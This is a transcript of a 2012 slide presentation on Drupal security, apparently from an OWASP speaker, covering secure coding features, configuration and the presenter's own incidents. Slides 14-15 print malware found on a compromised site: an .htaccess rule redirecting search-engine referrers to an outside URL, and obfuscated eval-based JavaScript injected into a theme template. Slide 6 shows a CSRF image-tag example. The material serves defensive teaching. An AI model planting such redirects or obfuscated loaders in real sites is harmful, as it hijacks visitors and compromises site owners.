1 / 17

A Brief Analysis of Drupal Security

A Brief Analysis of Drupal Security. Andrew Welsh 21 Feb 2012. Presentation Overview. Introduction What is Drupal Secure Drupal Code Drupal Configuration Personal Drupal Issues Conclusion. Introduction. whoami; Andrew.welsh@owasp.org. What is Drupal.

stormy
Télécharger la présentation

A Brief Analysis of Drupal Security

An Image/Link below is provided (as is) to download presentation Download Policy: Content on the Website is provided to you AS IS for your information and personal use and may not be sold / licensed / shared on other websites without getting consent from its author. Content is provided to you AS IS for your information and personal use only. Download presentation by click this link. While downloading, if for some reason you are not able to download a presentation, the publisher may have deleted the file from their server. During download, if you can't get a presentation, the file might be deleted by the publisher.

E N D

Presentation Transcript

  1. A Brief Analysis of Drupal Security Andrew Welsh 21 Feb 2012

  2. Presentation Overview Introduction What is Drupal Secure Drupal Code Drupal Configuration Personal Drupal Issues Conclusion

  3. Introduction • whoami; • Andrew.welsh@owasp.org

  4. What is Drupal Drupal is a mature, open-source, PHP-based CMS and web application framework. The Drupal project is composed of two principal bodies of work: (1) the Drupal core code base (2) thousands of contributed modules and themes

  5. What is Drupal Sites that use Drupal: Nasa The Economist Ubuntu 20th Century Fox Searchlight Warner Bros Recordings United Nations – End Poverty 2015 Yahoo! Research Amnesty International OpenOffice Extensions Popular Science AOL Corporate Nike Beijing Olympics White House

  6. Secure Drupal Code Form API: <img src="http://test.com/index.php?delete=12" /> It requires the form to be loaded (given a token) before form submission can happen, making CSRF more difficult. It validates and sanitizes data from form submissions, making XSS more difficult.

  7. Secure Drupal Code ACL- URL access Http://www.site.com/user/1/delete Menu system handles permission checking user_access('administer nodes', $account) node_access('edit', $node, $account) - drupal_goto() instances are used to validate their compliance with internal redirects

  8. Secure Drupal Code Authentication User sessions are destroyed and recreated upon logging out and logging in. Session IDs changed when permissions change. Auth cookies are not modifiable by site users. Passwords are salted and hashed.

  9. Secure Drupal Code Database API - to enforce security checks and good coding standards. Bind Parameters Named Placeholders

  10. Drupal Configuration Configure logging appropriately, never display log errors to users. Never display db connection strings. Check watchdog report. Look at all administrator permissions. Watch input formats for comments, etc.

  11. Drupal Configuration (v5)

  12. Drupal Configuration Update Regularly!

  13. Personal Drupal Issues Public node access

  14. Personal Drupal Issues #336988# <IfModule mod_rewrite.c> RewriteEngine On RewriteCond %{HTTP_REFERER} ^.*(abacho|abizdirectory|about|acoon|alexana|allesklar|allpages|allthesites|alltheuk|alltheweb|altavista|america|amfibi|aol|apollo7|aport|arcor|ask|atsearch|baidu|bellnet|bestireland|bhanvad|bing|blog|bluewin|botw|brainysearch|bricabrac|browseireland|chapu|claymont|click4choice|clickey|clickz|clush|confex|cyber-content|daffodil|devaro|dmoz|dogpile|ebay|ehow|eniro|entireweb|euroseek|exalead|excite|express|facebook|fastbot|filesearch|findelio......sympatico|telfort|telia|teoma|terra|the-arena|thisisouryear|thunderstone|tiscali|t-online|topseven|twitter|ukkey|uwe|verygoodsearch|vkontakte|voila|walhello|wanadoo|web|webalta|web-archiv|webcrawler|websuche|westaustraliaonline|wikipedia|wisenut|witch|wolong|ya|yahoo|yandex|yell|yippy|youtube|zoneru)\.(.*) RewriteRule ^(.*)$ http://forumbeagle.cba.pl/store/traf.php [R=301,L] </IfModule> #/336988#

  15. Personal Drupal Issues JS injection in page.tpl.php <script type=\"text/javascript\" language=\"javascript\" > try{window.document.body++}catch(gdsgsdg){dbshre=179;} if(dbshre){ asd=0; try{d=document.createElement(\"div\");d.innerHTML.a=\"asd\";} catch(agdsg){asd=1;} if(!asd){e=eval;} ss=String; asgq=newArray(31,94,110,104,94,107.........101,108,39,97,96,107,61,101,95,104,92,102,109,60,116,64,92,33,33,93,113,99,93,100,34,32,38,90,106,107,92,102,93,61,99,96,100,93,34,93,113,99,93,100,36,50,5,3,26,27,23,24,118,7,5,116,33,33,35,54); s=\"\"; for(i=0;i-500!=0;i++){ if((020==0x10)&&window.document )s+=ss[\"fromCharCode\"](1*asgq[i]-(i%5-5-4)); } z=s; e(s) } </script>

  16. Conclusion Personal Thoughts: Drupal is a very good, well-used, peer-reviewed CMS and the security aspect is well addressed. Always stay current with upgrades. Be careful with custom code (themes or modules), always peer review.

  17. Thank You • Sources: • http://drupal.org/writing-secure-code • http://drupal.org/node/766404 • http://drupal.org/security/secure-configuration • http://www.mediacurrent.com/blog/drupal-security-review • http://www.slideshare.net/fourkitchens/is-drupal-secure • http://drupalsecurityreport.org/sites/drupalsecurityreport.org/files/drupal-security-white-paper-1-1.pdf • http://drupal.org/documentation/is-drupal-secure • http://www.cameronandwilding.com/blog/pablo/10-most-critical-drupal-security-risks • Contact Info: • Andrew.welsh@owasp.org

More Related